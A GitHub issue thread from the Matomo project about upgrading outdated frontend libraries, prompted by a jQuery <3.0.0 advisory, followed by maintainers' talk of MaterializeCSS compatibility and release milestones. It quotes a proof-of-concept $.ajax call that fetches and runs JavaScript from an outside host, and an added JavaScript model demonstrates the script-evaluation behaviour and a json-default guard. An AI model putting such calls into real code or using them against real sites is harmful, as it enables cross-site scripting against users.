
update frontend libraries like jquery #12961

Closed
Findus23 opened this issue May 23, 2018 · 10 comments
Labels
c: Security For issues that make Matomo more secure. Please report issues through HackerOne and not in Github. Task Indicates an issue is neither a feature nor a bug and it's purely a "technical" change.

@Findus23
Member

Findus23 commented May 23, 2018

I know this is a tedious task with no direct benefit, but with the possibility of breaking some things.

But most JS libraries haven't been updated since Piwik 3 in 2016. And since then many things changed, new browsers appeared and security issues were found.

One of the largest that (kind of) affects Matomo is https://nodesecurity.io/advisories/328 which affects all jQuery versions <3.0.0
Simply put, running

$.ajax('http://sakurity.com/jqueryxss')

in Matomo executes the JavaScript at http://sakurity.com/jqueryxss.
Thankfully @sgiehl had the great foresight 6 years ago when creating the ajaxhelper (in 9979315) to fall back to "json" as a format, so I think Matomo isn't affected.

But I still think that updating JS regularly will avoid possible future issues.

(The same can be said for composer dependencies, but thanks to the new npm audit command, checking for security issues in frontend libraries was easier)
Update: It seems like https://packagist.org/packages/roave/security-advisories is something similar for php dependencies

@Findus23 Findus23 added Task Indicates an issue is neither a feature nor a bug and it's purely a "technical" change. c: Security For issues that make Matomo more secure. Please report issues through HackerOne and not in Github. labels May 23, 2018
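To make the advisory above concrete, here is an added example (not code from Matomo, jQuery or the issue author) that models, in plain JavaScript and without jQuery, how jQuery 1.x/2.x picks a response handler when `$.ajax(url)` is called with no `dataType`: the Content-Type header is matched against a guess table, and a `text/javascript` reply is handed to the script converter, which evaluates it. The same reply under a forced `dataType: "json"` goes through `JSON.parse` and fails with jQuery's `parsererror` status instead of executing. The names `ajaxModel`, `makeResponse`, `ajaxWithJsonDefault` and the demo functions are this example's own; the guess table is a simplified rendering of jQuery's `ajaxSettings.contents`, and the responses are constructed inline.

```javascript
"use strict";

// Simplified stand-in for jQuery's ajaxSettings.contents (jQuery < 3.0.0):
// with no dataType given, the first regex matching the Content-Type decides
// how the body is handled. Order and coverage are approximated here.
const CONTENT_GUESS = [
  { type: "json",   re: /\bjson\b/ },
  { type: "script", re: /\b(?:java|ecma)script\b/ },
  { type: "xml",    re: /\bxml\b/ },
];

// Constructed fake XHR reply: only the fields the model inspects.
function makeResponse(contentType, body) {
  return { headers: { "content-type": contentType }, body };
}

// Log of everything the script converter evaluated, for inspection/asserts.
const executed = [];

// Model of the "text script" converter: jQuery ends up evaluating the body
// in global scope (globalEval). Indirect eval has the same effect here.
function globalEval(code) {
  executed.push(code);
  return (0, eval)(code);
}

// Model of jQuery.ajax data handling in jQuery < 3.0.0.
function ajaxModel(settings, response) {
  let dataType = settings.dataType;
  if (!dataType) {
    // No dataType: "intelligent guess" from the server-controlled header.
    const ct = response.headers["content-type"] || "";
    const hit = CONTENT_GUESS.find((g) => g.re.test(ct));
    dataType = hit ? hit.type : "text";
  }
  switch (dataType) {
    case "json":
      try {
        return { type: "json", data: JSON.parse(response.body) };
      } catch (e) {
        // A script body is not JSON: jQuery reports textStatus "parsererror".
        return { type: "json", error: "parsererror" };
      }
    case "script":
      return { type: "script", data: globalEval(response.body) };
    default:
      return { type: dataType, data: response.body };
  }
}

// Hypothetical wrapper in the spirit of an ajax helper that always defaults
// the format to "json" unless the caller asks for something else.
function ajaxWithJsonDefault(settings, response) {
  return ajaxModel(Object.assign({ dataType: "json" }, settings), response);
}

// Attacker-controlled endpoint replying with a script Content-Type.
const hostileReply = makeResponse(
  "text/javascript",
  "globalThis.pwned = 'attacker'; 'script ran'"
);

// Unguarded $.ajax(url): the header guess selects "script" and the body runs.
function demoUnguarded() {
  return ajaxModel({}, hostileReply);
}

// Same reply through the json-defaulting wrapper: no execution, parse error.
function demoGuardedAttack() {
  return ajaxWithJsonDefault({}, hostileReply);
}

// Legitimate JSON reply through the wrapper still works as expected.
function demoGuardedValid() {
  return ajaxWithJsonDefault(
    {},
    makeResponse("application/json", '{"result":"ok"}')
  );
}
```

Running `demoUnguarded()` returns `{ type: "script", data: "script ran" }` and leaves `globalThis.pwned` set, which is the behaviour the advisory describes; `demoGuardedAttack()` returns `{ type: "json", error: "parsererror" }` without touching `executed`, and `demoGuardedValid()` returns the parsed object. Pinning `dataType` is a defence for the pages that use the helper; calls that bypass it and pass a URL to `$.ajax` directly are still exposed until the library itself is upgraded.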
@tsteur
Member

tsteur commented May 23, 2018

Just FYI: MaterializeCSS is not compatible with jQuery 3+ in case it was planned to update to a newer jquery major version.

@Findus23
Member Author

Findus23 commented May 23, 2018

@tsteur It seems like the fix has already been merged a year ago and will be released soon:
Dogfalo/materialize#3201

But I wouldn't be surprised if a lot of other things stop working.

@tsteur
Member

tsteur commented May 23, 2018

@Findus23 that will be in MaterializeCSS 1.0, but we are likely not compatible with that version and may need to update a bit of code and plugins to make that work (to be tested). Just saying we may not be easily able to upgrade to that version, and only as part of Matomo 4.0, as it may be hard for plugins to stay compatible with the 0.X and 1.X versions of MaterializeCSS etc. But maybe it is not really an issue; it is just a matter of testing to see how much we need to change and what. Most of the logic is centralized so it might not be too bad.

@mattab mattab added this to the 3.8.0 milestone Sep 10, 2018
@Findus23
Member Author

BTW: MaterializeCSS 1.0 just came out.

@mmakos-profidata

mmakos-profidata commented Sep 16, 2019

Is there a chance that this issue will be resolved in the next version (3.12.0)?

@diosmosis
Member

It's probably not something I will finish for 3.12, but someone else could finish the work I started.

@tsteur
Member

tsteur commented Sep 16, 2019

I'm not sure what exactly we're planning to upgrade? jQuery we likely can't update since Materialize is not compatible, and we very likely don't want to update Materialize to 1.0 as there are a lot of breaking changes AFAIK, plugins would become incompatible, we would not be able to have plugins compatible with new and older versions of Matomo, and it would be a lot of work to update them all if/where needed. This would be rather something for Matomo 4.

@Findus23
Member Author

Findus23 commented Sep 16, 2019 via email

@tsteur
Member

tsteur commented Sep 16, 2019

But after that it might be worth it to stay up to date more regularly as applying minor updates is easier than falling too far behind.

Totally, the only problem is really when they have major updates with breaking changes. In general the goal should be to update minor and patch releases of libs during a release.

@tsteur tsteur modified the milestones: 3.12.0, 4.0.0 Sep 16, 2019
@diosmosis diosmosis reopened this Jun 7, 2020
@diosmosis
Member

Finally closed in #16079, only library that needs to be dealt w/ is jqplot but that is too hard to do atm.
